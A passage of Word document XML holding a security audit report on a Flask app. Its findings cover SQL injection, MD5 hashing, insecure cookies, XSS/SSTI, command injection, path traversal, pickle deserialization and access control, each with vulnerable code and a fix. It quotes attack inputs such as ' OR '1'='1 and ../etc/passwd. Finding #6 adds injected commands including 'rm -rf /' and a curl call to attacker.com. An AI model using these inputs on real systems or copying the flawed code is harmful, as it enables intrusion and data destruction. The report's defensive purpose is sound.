      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   CWE: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">CWE-89: Improper Neutralization of Special Elements used in an SQL Command   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   Location: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">app.py, lines 44 and 81</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">User-supplied username/password values are inserted directly into SQL query strings using % formatting and string concatenation, in both the login handler and the profile lookup route.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">An attacker can inject SQL syntax (e.g. ' OR '1'='1) to bypass authentication entirely, read arbitrary rows from the users table, or in some database configurations, chain into further compromise.</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query = "SELECT * FROM users WHERE username = '%s' AND password = '%s'" % (</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    username, hashlib.md5(password.encode()).hexdigest())</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">cursor = conn.execute(query)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendation: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Always use parameterized queries / prepared statements. The database driver handles escaping, which eliminates the injection class entirely regardless of input content.</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cursor = conn.execute(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    "SELECT id, username, password_hash, is_admin FROM users WHERE username = ?",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    (username,),</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding #3  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Weak Password Hashing (MD5)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t xml:space="preserve">High   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   CWE: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">CWE-327: Use of a Broken or Risky Cryptographic Algorithm   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   Location: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">app.py, line 46</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Passwords are hashed with unsalted MD5, an algorithm that is cryptographically broken and extremely fast to brute-force with commodity GPUs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">If the users table is ever leaked, essentially all passwords can be recovered within minutes to hours using precomputed rainbow tables or GPU cracking, with no per-user salt to slow attackers down.</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hashlib.md5(password.encode()).hexdigest()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendation: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Use a slow, salted, adaptive hashing algorithm designed for passwords: Werkzeug's generate_password_hash (PBKDF2), bcrypt, or argon2. Never compare hashes with plain '==' when possible — use the library's constant-time check function.</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from werkzeug.security import generate_password_hash, check_password_hash</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 at signup:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">password_hash = generate_password_hash(password)</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 at login:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">if user and check_password_hash(user.password_hash, password):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding #4  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Insecure Session Cookie Attributes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D68910"/>
        </w:rPr>
        <w:t xml:space="preserve">Medium   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   CWE: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">CWE-614 / CWE-1004: Sensitive Cookie Without Secure/HttpOnly Flag   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   Location: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">app.py, line 56</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The session_user cookie is set without Secure, HttpOnly, or SameSite attributes, and it is also used later as an implicit trust token (see Finding #9).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Without HttpOnly, the cookie is readable by JavaScript, making it a direct target for theft via any XSS bug (see Finding #5). Without Secure, it can be transmitted over plain HTTP and intercepted on the network.</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resp.set_cookie("session_user", username)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendation: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Set HttpOnly, Secure, and SameSite on every session-related cookie, and prefer Flask's built-in signed session object over a hand-rolled cookie value.</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app.config.update(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    SESSION_COOKIE_HTTPONLY=True,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    SESSION_COOKIE_SECURE=True,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    SESSION_COOKIE_SAMESITE="Lax",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding #5  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Site Scripting via Template Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t xml:space="preserve">High   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   CWE: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">CWE-79: Improper Neutralization of Input During Web Page Generation   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   Location: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">app.py, line 73</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The dashboard route builds a Jinja template string by concatenating raw, attacker-controlled cookie content, then passes it to render_template_string. This is both a Server-Side Template Injection (SSTI) risk and a straightforward reflected XSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">An attacker who controls the session_user value can inject HTML/JavaScript (XSS) or, worse, Jinja template syntax such as {{7*7}} that gets evaluated server-side, potentially leading to remote code execution via SSTI gadgets.</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template = "&lt;h1&gt;Welcome back, " + username + "!&lt;/h1&gt;"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">return render_template_string(template)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendation: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Never build template strings from untrusted input. Use static templates with variables passed as context (Jinja auto-escapes by default), or escape the value explicitly when interpolating into an f-string response.</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return f"&lt;h1&gt;Welcome back, {escape(user[0])}!&lt;/h1&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding #6  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">OS Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t xml:space="preserve">High   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   CWE: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">CWE-78: Improper Neutralization of Special Elements used in an OS Command   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   Location: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">app.py, line 90</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The /ping endpoint concatenates a user-supplied host parameter directly into a shell command string executed with shell=True.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">An attacker can supply a value like 127.0.0.1; rm -rf / or 127.0.0.1 &amp;&amp; curl attacker.com/x to chain arbitrary OS commands, leading to full server compromise.</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host = request.args.get("host", "127.0.0.1")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">result = subprocess.check_output("ping -c 1 " + host, shell=True)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendation: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Avoid shell=True entirely. Pass arguments as a list so there is no shell to inject into, and validate the input against a strict allow-list (e.g. a valid IP address) before use.</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ipaddress.ip_address(host)  # raises ValueError if not a valid IP</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">result = subprocess.check_output(["ping", "-c", "1", host], shell=False)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding #7  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Path Traversal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t xml:space="preserve">High   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   CWE: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">CWE-22: Improper Limitation of a Pathname to a Restricted Directory   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   Location: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">app.py, line 101</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The /download endpoint joins a user-supplied file parameter directly onto a base directory without validating that the result stays within that directory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">An attacker can request ?file=../../../../etc/passwd (or a Windows equivalent) to read arbitrary files readable by the application process, including configuration files or secrets.</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path = os.path.join(os.path.dirname(__file__), "files", filename)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">with open(path, "rb") as f:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return f.read()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendation: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Reject path separators outright, then resolve the final path with os.path.realpath and verify it still starts with the intended base directory before opening it.</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safe_path = os.path.realpath(os.path.join(FILES_DIR, filename))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">if not safe_path.startswith(os.path.realpath(FILES_DIR) + os.sep):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    abort(400, "Invalid filename")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding #8  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Insecure Deserialization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t xml:space="preserve">High   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   CWE: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">CWE-502: Deserialization of Untrusted Data   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   Location: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">app.py, line 109</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The /load_prefs endpoint passes the raw HTTP request body directly to pickle.loads().</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Python's pickle format can encode arbitrary object construction/method calls. Unpickling attacker-controlled bytes is a well-known remote code execution primitive — the request body can execute arbitrary code on the server.</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data = request.get_data()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">prefs = pickle.loads(data)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendation: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Never unpickle data from an untrusted source. Use a safe, data-only format such as JSON, and validate/parse it defensively.</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try:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    prefs = json.loads(request.get_data())</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">except json.JSONDecodeError:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    abort(400, "Invalid preferences payload")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding #9  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Broken Access Control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t xml:space="preserve">High   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   CWE: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">CWE-862 / CWE-284: Missing / Improper Authorization   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   Location: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">app.py, line 119</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The /admin endpoint decides administrative access by reading the client-supplied session_user cookie and checking whether its value equals the literal string "admin" — a value any client can set themselves.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
